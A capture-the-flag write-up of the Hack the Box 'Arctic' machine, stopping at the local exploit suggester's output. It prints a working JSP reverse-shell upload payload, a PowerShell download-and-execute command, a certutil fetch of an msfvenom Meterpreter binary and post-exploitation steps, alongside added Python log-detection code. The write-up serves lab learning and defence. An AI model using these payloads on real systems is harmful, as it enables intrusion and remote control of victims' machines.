【Hack the Box write-up】Arctic

February 20, 2020

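This is the first Hack the Box machine I have attempted.

Some of my explanations are probably sloppy, so if you have any advice or corrections, please do leave a comment.

Arctic, the machine I'm attempting this time, is already retired, so the official walkthrough is public on YouTube. I'll follow it as a reference as I go.

Cheat sheet

I've collected tool usage notes and the like as a cheat sheet at the link below. Feel free to refer to it. github | sanposhiho/MYCHEATSHEET

About the machine

The difficulty is easy.

Port scan with nmap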

kali@kali:~$ nmap -Pn -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 00:36 EST
Nmap scan report for 10.10.10.11
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.32 seconds

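About the nmap options used

All Nmap scan commands and options explained in Japanese | Keep your network secure with Nmap

-Pn : sends TCP packets to ports 80 and 443 in addition to ICMP, and also sends ARP within the same segment, to determine whether the host exists
-A : detects the OS type and its version

What is ICMP

Apparently nmap normally checks reachability with ping before scanning. ICMP is apparently the protocol used when you run the ping command. ICMP and the PING command

What is ARP

ARP is apparently the protocol used to find a MAC address from an IP address.

Taking a look at the official walkthrough

The official walkthrough used nmap with the following options.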

$ nmap -sV -sC -oA nmap 10.10.10.11

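About the options

-sV : performs version detection only (-A detects the OS type and version)
-sC : runs the default NSE scripts
-oA : writes the results (in all formats)

The following official references are helpful: Service and Version Detection; Output; Chapter 9. Nmap Scripting Engine

For NSE, the following page is also helpful. Nmap Scripting Engine

Accessing the discovered port 8500 in a browser

I couldn't make much sense of the results, so I tried accessing every port. Only port 8500 shows a directory listing.

After poking around, accessing /CFIDE/administrator brings up a page labelled Coldfusion8 administrator.

Searching for a Coldfusion exploit

I search for Coldfusion8 exploits with the searchsploit command.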

kali@kali:~$ searchsploit coldfusion
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                                                   | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                                                | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                                                   | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                                         | exploits/multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                                                                     | exploits/cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                                                                    | exploits/cfm/webapps/36172.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                                             | exploits/windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)                                                                | exploits/multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                                       | exploits/multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)                                                             | exploits/multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                                          | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting                       | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                                | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                                 | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                                           | exploits/windows/remote/43993.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                                                   | exploits/multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                                         | exploits/windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure                                                                | exploits/multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                                     | exploits/cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                                               | exploits/multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                                                 | exploits/cfm/remote/21548.txt
ColdFusion MX - Remote Development Service                                                                                            | exploits/windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure                                                                             | exploits/asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service                                                        | exploits/multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure                                                                     | exploits/cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service                                                              | exploits/multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                                             | exploits/multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting                                                                 | exploits/cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation                                                                 | exploits/multiple/remote/24654.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Pulling out the version 8 entries:

Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                                          | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting                       | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                                | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                                 | exploits/cfm/webapps/33168.txt

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                                     | exploits/cfm/webapps/16788.rb

I'll use the File Upload one.

Working at it with Metasploit

msf5 > search coldfusion

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank       Check  Description
   -  ----                                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/coldfusion_pwd_props                          2013-05-07       normal     Yes    ColdFusion 'password.properties' Hash Extraction
   1  auxiliary/scanner/http/adobe_xml_inject                                         normal     No     Adobe XML External Entity Injection
   2  auxiliary/scanner/http/coldfusion_locale_traversal                              normal     No     ColdFusion Server Check
   3  auxiliary/scanner/http/coldfusion_version                                       normal     No     ColdFusion Version Scanner
   4  exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce  2016-03-28       excellent  Yes    HID discoveryd command_blink_on Unauthenticated RCE
   5  exploit/multi/http/coldfusion_ckeditor_file_upload             2018-09-11       excellent  No     Adobe ColdFusion CKEditor unrestricted file upload
   6  exploit/multi/http/coldfusion_rds_auth_bypass                  2013-08-08       great      Yes    Adobe ColdFusion RDS Authentication Bypass
   7  exploit/windows/http/coldfusion_fckeditor                      2009-07-03       excellent  No     ColdFusion 8.0.1 Arbitrary File Upload and Execute


msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > show options

Module options (exploit/windows/http/coldfusion_fckeditor):

   Name           Current Setting                                                             Required  Description
   ----           ---------------                                                             --------  -----------
   FCKEDITOR_DIR  /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm  no        The path to upload.cfm
   Proxies                                                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80                                                                          yes       The target port (TCP)
   SSL            false                                                                       no        Negotiate SSL/TLS for outgoing connections
   VHOST                                                                                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal Windows Target


msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11
RHOSTS => 10.10.10.11
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
RPORT => 8500
msf5 exploit(windows/http/coldfusion_fckeditor) > run

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.

Running the exploit above in the ordinary way fails.

Tweaking the advanced options

msf5 exploit(windows/http/coldfusion_fckeditor) > show advanced option

Module advanced options (exploit/windows/http/coldfusion_fckeditor):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for windows authentification
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPartialResponses    false                                               no        Return partial HTTP responses despite timeouts
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                0                                                   no        Additional delay when waiting for a session


Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/http/coldfusion_fckeditor) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/http/coldfusion_fckeditor) > run

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.

I changed VERBOSE to true, but the output did not change.

Burp Suite

I look at the contents of the request in Burp Suite to find the cause.

Configure it as follows.

[Screenshots of the Burp Suite settings]

With this, requests arriving at localhost:8500 are redirected by Burp Suite to 10.10.10.11:8500.

Trying again

After confirming that intercept is on, I point the exploit at localhost:8500 and run it.

msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/http/coldfusion_fckeditor) > run

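It fails in the same way, but Burp Suite catches the request. Using Repeater, I resend the captured request (the one sent by run) through Burp Suite.

And then it succeeds.

Note: this part is still a mystery to me. Why does it fail with Metasploit but succeed when I use Burp Suite? My own guess is that Metasploit treats the attempt as failed if there is no response within a certain time, and since this single request takes a while before the response comes back, it was counted as a failure. But I'm not sure. (If anyone knows, please leave a comment 🙇‍♂️)

Looking at what the request sends

Let's see what run actually sends in the request.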

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/Y.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_387_507016430_1561099465
Content-Length: 1585
Connection: close

--_Part_387_507016430_1561099465
Content-Disposition: form-data; name="newfile"; filename="QNAXOXFN.txt"
Content-Type: application/x-java-archive

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream sq;
    OutputStream ab;

    StreamConnector( InputStream sq, OutputStream ab )
    {
      this.sq = sq;
      this.ab = ab;
    }

    public void run()
    {
      BufferedReader ek  = null;
      BufferedWriter hnb = null;
      try
      {
        ek  = new BufferedReader( new InputStreamReader( this.sq ) );
        hnb = new BufferedWriter( new OutputStreamWriter( this.ab ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = ek.read( buffer, 0, buffer.length ) ) > 0 )
        {
          hnb.write( buffer, 0, length );
          hnb.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( ek != null )
          ek.close();
        if( hnb != null )
          hnb.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath = "cmd.exe";
    Socket socket = new Socket( "10.10.14.2", 4444 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>

--_Part_387_507016430_1561099465--

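The request has CurrentFolder=/Y.jsp%00, with a null byte at the end. Is it right to understand that this is how it slips past the CurrentFolder check? (My understanding here is shaky too.)

Judging from the contents of the file, it looks like I can get a reverse shell by listening on 10.10.14.2:4444.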
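Seen from the defender's side, the request above has two traits that stand out in a web access log: a POST to the FCKeditor upload.cfm connector, and a CurrentFolder value that carries a percent-encoded null byte after a .jsp name. The following is an added example (not code from the original post or from any tool it uses) that flags such requests and shows an allow-list check for CurrentFolder; the log format, the sample lines, the function names, the extension list and the allow-list policy are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Connector path from the request captured in the write-up (compared lower-cased).
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
# Extensions treated as server-executable: an assumption made for this example.
EXECUTABLE_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")
# Request field of a combined-log-format line (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumed allow-list policy: "/" or "/name/name/", using letters, digits, "_" and "-" only.
SAFE_FOLDER_RE = re.compile(rb"/(?:[A-Za-z0-9_-]+/)*")

# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = """\
10.10.14.2 - - [16/Feb/2020:21:38:44 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/Y.jsp%00 HTTP/1.1" 200 512
10.10.14.2 - - [16/Feb/2020:21:40:02 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/docs/ HTTP/1.1" 200 498
10.10.14.2 - - [16/Feb/2020:21:41:10 +0000] "POST /cfide/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=%2Fa.cfm%2500 HTTP/1.1" 200 512
10.10.14.2 - - [16/Feb/2020:21:42:00 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 2048
"""


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded NUL (%2500) is caught too."""
    data = value.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def query_params(target):
    """Return the raw (still percent-encoded) query parameters, keys lower-cased."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        if name:
            params[name.lower()] = value
    return params


def inspect_upload_request(method, target):
    """List the traits this request shares with the upload request in the write-up."""
    path = fully_decode(urlsplit(target).path).decode("latin-1").lower()
    if method != "POST" or path != CONNECTOR:
        return []
    findings = []
    folder = fully_decode(query_params(target).get("currentfolder", ""))
    if b"\x00" in folder:
        findings.append("null byte in CurrentFolder")
    # The part in front of the first NUL is what a C-style string consumer would see.
    visible = folder.split(b"\x00", 1)[0].decode("latin-1").lower()
    if visible.endswith(EXECUTABLE_EXT):
        findings.append("executable extension in CurrentFolder")
    return findings


def folder_is_acceptable(raw_value):
    """Allow-list check for CurrentFolder; anything not fully matching is rejected."""
    return SAFE_FOLDER_RE.fullmatch(fully_decode(raw_value)) is not None


def scan_access_log(text):
    """Return (line number, findings) for every suspicious connector request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_upload_request(match["method"], match["target"])
        if findings:
            hits.append((lineno, findings))
    return hits


if __name__ == "__main__":
    for lineno, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

The allow-list check fails closed: a value that still contains a percent sign after three decoding rounds does not match and is rejected.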

Executing the uploaded file

First, I listen for the reverse shell with the nc command.

kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...

After turning off the intercept from earlier, I execute the file uploaded earlier by accessing it in the browser.

Then:

kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49224
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>

The reverse shell is obtained like this.

About the nc options

Useful features of Netcat

-n: do not resolve names via DNS
-l: listen mode
-v: print standard messages
-p: specify the port

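I want to use Meterpreter

I use unicorn. (It doesn't seem to be included in Kali Linux by default, so I downloaded it from GitHub.)

unicorn is apparently a tool that uses a PowerShell downgrade attack to take care of things for you. (I don't really understand this one either.)

The usage of unicorn is:

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

I run the following command.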

kali@kali:~$ unicorn/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 31337

This generates two files.

Generated file 1: unicorn.rc

kali@kali:~$ cat unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 31337
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j

It writes out the various things that need to be done inside Metasploit.

Generated file 2: powershell_attack.txt

kali@kali:~$ cat powershell_attack.txt

This is the actual attack code.

Running powershell_attack.txt from the reverse shell obtained earlier

First, I edit powershell_attack.txt and save it as exploit.html.


The changes from powershell_attack.txt are:
・Remove the trailing "
・Also remove the matching " near the beginning
・Also remove the leading powershell /w 1 /C

Next, start a local server with Python.

$ python -m SimpleHTTPServer

Also start msfconsole using unicorn.rc.

$ msfconsole -r unicorn.rc

Then, from the reverse shell obtained earlier, fetch exploit.html and execute its contents.

C:\ColdFusion8\runtime\bin> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/exploit.html')"

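However

Well, this fails... The server returns a 200 response, so I suspect either something is wrong with exploit.html or I made a mistake in the unicorn configuration, but even after reviewing everything fairly carefully I could not find the cause...

Change of plan → use msfvenom

Using msfvenom

Note: from here on, what was LHOST=10.10.14.2 changes to LHOST=10.10.14.13.

I will follow the writeup below. Hack the Box Writeup: Arctic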

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9090 -f exe > arctic.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Listening with Metasploit

kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***


      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lport 9090
lport => 9090
msf5 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf5 exploit(multi/handler) > exploit -j

Then, in the reverse shell obtained earlier:

C:\ColdFusion8\runtime\bin>certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\ColdFusion8\runtime\bin>arctic.exe
arctic.exe

After a short while, msfconsole shows:

[*] Meterpreter session 1 opened (10.10.14.13:9090 -> 10.10.10.11:49609) at 2020-02-19 10:40:51 -0500

The response comes back like this.

Checking meterpreter

Check that it works properly.
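The download-and-run steps above (the certutil fetch, the PowerShell download cradle, and the shell running under jrun.exe) all leave process-creation records. The following Python is an added example, not part of the original write-up: it runs four detection rules over constructed records. The record layout, the rule names and the allowlist of expected server binaries are assumptions.

```python
import re

# Constructed process-creation records (parent image, image, command line), shaped
# like Sysmon Event ID 1 or Security 4688 with command-line auditing. Not real logs.
SAMPLE_EVENTS = [
    (r"C:\ColdFusion8\runtime\bin\jrun.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     'certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe'),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell "IEX(New-Object Net.WebClient).downloadString'
     '(\'http://10.10.14.2:8000/exploit.html\')"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\ColdFusion8\runtime\bin\arctic.exe", "arctic.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -verify C:\certs\site.cer"),
]

# Assumption: the only binaries expected to run from the server's bin directory.
SERVER_BIN = r"c:\coldfusion8\runtime\bin"
EXPECTED_SERVER_BINARIES = {"jrun.exe", "jrunsvc.exe"}


def certutil_url_download(parent, image, cmd):
    return bool(re.search(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", cmd, re.I))


def powershell_download_cradle(parent, image, cmd):
    c = cmd.lower()
    return image.lower().endswith("\\powershell.exe") and "downloadstring" in c \
        and bool(re.search(r"\b(iex|invoke-expression)\b", c))


def app_server_spawned_shell(parent, image, cmd):
    child = image.lower().rsplit("\\", 1)[-1]
    return parent.lower().endswith("\\jrun.exe") and child in {"cmd.exe", "powershell.exe"}


def unexpected_binary_in_server_dir(parent, image, cmd):
    directory, _, name = image.lower().rpartition("\\")
    return directory == SERVER_BIN and name not in EXPECTED_SERVER_BINARIES


RULES = [certutil_url_download, powershell_download_cradle,
         app_server_spawned_shell, unexpected_binary_in_server_dir]


def triage(events):
    """Map event index -> names of rules that fired; events with no hit are omitted."""
    hits = {i: [rule.__name__ for rule in RULES if rule(*e)] for i, e in enumerate(events)}
    return {i: names for i, names in hits.items() if names}
```

The last sample record is an ordinary `certutil -verify` call and is deliberately not flagged, which is the false-positive case the `-urlcache` plus URL condition is there to avoid.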

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > load stdapi
Loading extension stdapi...meterpreter >
meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: ARCTIC\tolis
Server username: ARCTIC\tolis

Perfect.

Notice here that Architecture is x64 while Meterpreter is x86/windows. I will make these match.

Migrating to another process

meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User          Path
 ---   ----  ----                     ----  -------  ----          ----
 0     0     [System Process]
 4     0     System
 236   4     smss.exe
 328   308   csrss.exe
 336   484   svchost.exe
 372   308   wininit.exe
 392   380   csrss.exe
 436   380   winlogon.exe
 484   372   services.exe
 500   372   lsass.exe
 508   372   lsm.exe
 608   484   svchost.exe
 680   484   svchost.exe
 756   436   LogonUI.exe
 764   484   svchost.exe
 804   484   svchost.exe
 840   484   spoolsv.exe
 852   484   svchost.exe
 908   484   svchost.exe
 924   1832  arctic.exe               x86   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\arctic.exe
 948   484   svchost.exe
 1048  484   CF8DotNetsvc.exe
 1092  1048  JNBDotNetSide.exe
 1100  328   conhost.exe
 1120  328   conhost.exe
 1136  1312  k2server.exe
 1148  484   jrunsvc.exe              x64   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\jrunsvc.exe
 1176  1148  jrun.exe                 x64   0        ARCTIC\tolis  C:\ColdFusion8\runtime\bin\jrun.exe
 1184  484   swagent.exe
 1192  328   conhost.exe              x64   0        ARCTIC\tolis  C:\Windows\System32\conhost.exe
 1224  484   swstrtr.exe
 1236  1224  swsoc.exe
 1244  328   conhost.exe
 1312  484   k2admin.exe
 1424  608   WmiPrvSE.exe
 1456  484   svchost.exe
 1512  484   VGAuthService.exe
 1752  484   vmtoolsd.exe
 1776  484   ManagementAgentHost.exe
 1832  1176  cmd.exe                  x64   0        ARCTIC\tolis  C:\Windows\System32\cmd.exe
 2092  1312  k2index.exe
 2116  328   conhost.exe
 3068  484   svchost.exe
 3144  484   dllhost.exe
 3304  484   msdtc.exe
 3384  328   conhost.exe              x64   0        ARCTIC\tolis  C:\Windows\System32\conhost.exe
 3928  484   sppsvc.exe

Migrate to jrunsvc.exe.

meterpreter > migrate 1148
[*] Migrating from 924 to 1148...
[*] Migration completed successfully.

About the ps and migrate commands

ps : list the running processes
migrate : move to an active process

The Ultimate Command Cheat Sheet for Metasploit’s Meterpreter Metasploit Post-Exploitation

Using the suggester

The suggester checks for things like "this exploit might work here".

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 13 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

